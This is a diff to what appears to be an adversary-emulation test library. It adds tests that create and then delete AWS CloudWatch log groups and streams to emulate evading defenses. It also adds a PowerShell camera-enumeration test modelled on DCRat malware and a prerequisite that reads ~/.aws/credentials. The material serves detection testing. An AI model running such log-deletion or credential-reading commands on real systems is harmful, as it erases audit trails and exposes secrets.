+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - AWS CloudWatch Log Stream Deletes
+Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by 
+deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 33ca84bc-4259-4943-bd36-4655dc420932
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cloudwatch_log_group_name | Name of the cloudWatch log group | String | test-logs|
+| cloudwatch_log_stream_name | Name of the cloudWatch log stream | String | 20150601|
+| region | Name of the region | String | us-west-2|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Created ***"
+aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+echo "*** Log Stream Created ***"
+aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+echo "*** Log Stream Deleted ***"
+aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Deleted ***"
+```
+
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
 <br/>
@@ -318,6 +318,38 @@ atomic_tests:
    name: sh
    elevation_required: false
 - name: AWS - CloudWatch Log Stream Deletes
+  auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
+  description: |
+    Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by 
+    deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
+  supported_platforms:
+  - iaas:aws
+  input_arguments:
+    cloudwatch_log_group_name:
+      description: Name of the cloudWatch log group
+      type: String
+      default: "log-test"
+    region:
+      description: Name of the region
+      type: String
+      default: "us-east-1"
+  dependencies:
+    - description: |
+        Check if ~/.aws/credentials file has a default stanza is configured
+      prereq_command: |
+        cat ~/.aws/credentials | grep "default"
+      get_prereq_command: |
+        echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+  executor:
+    command: |
+       aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+       echo "*** Log Group Created ***"
+       aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+       echo "*** Log Group Deleted ***"
+    cleanup_command: 
+    name: sh
+    elevation_required: false
+- name: AWS CloudWatch Log Stream Deletes
  auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932
  description: |
    Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by 
@@ -0,0 +1,26 @@
+# T1592.001 - Gather Victim Host Information: Hardware
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1592/001/)
+<blockquote>Adversaries may use powershell script to gather information about the system, configuration, and even mounted hardware on the target host.
+
+  Dark Crystal Rat use several technique to gather hardware information of the compromised host like gathering the microphone, CPU, GPU, camera and many as part of its data collection and backdoor capabilities.
+</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Query Registry](#atomic-test-1---Enumerate PlugNPlay Camera)
+
+
+<br/>
+
+## Atomic Test #1 - Query Registry
+Enumerate PlugNPlay Camera.
+Upon successful execution, powershell.exe will perform queries to plugnplay camera device mounted on the host. 
+References:
+
+https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor
+
+https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** 08a04133-3f2a-4eb0-bdd8-2aa513d2fb60
@@ -0,0 +1,15 @@
+attack_technique: T1592.001
+display_name: 'Gather Victim Host Information: Hardware'
+atomic_tests:
+- name: Enumerate PlugNPlay Camera
+  auto_generated_guid: d430bf85-b656-40e7-b238-42db01df0183
+  description: |
+    Enumerate PlugNPlay Camera using powershell commandlet. this technique was seen in dcrat malware backdoor capabilities where it enumerate the camera info mounted on the compromised host. 
+    reference: https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Get-CimInstance -Query "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')"
+    name: powershell
+    elevation_required: true
@@ -1097,3 +1097,9 @@ df81db1b-066c-4802-9bc8-b6d030c3ba8e
 ae9b2e3e-efa1-4483-86e2-fae529ab9fb6
 a27418de-bdce-4ebd-b655-38f11142bf0c
 1e40bb1d-195e-401e-a86b-c192f55e005c
+33eacead-f117-4863-8eb0-5c6304fbfaa9
+3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+57ba4ce9-ee7a-4f27-9928-3c70c489b59d
+97116a3f-efac-4b26-8336-b9cb18c45188
+89422c87-b57b-4a04-a8ca-802bb9d06121
+33ca84bc-4259-4943-bd36-4655dc420932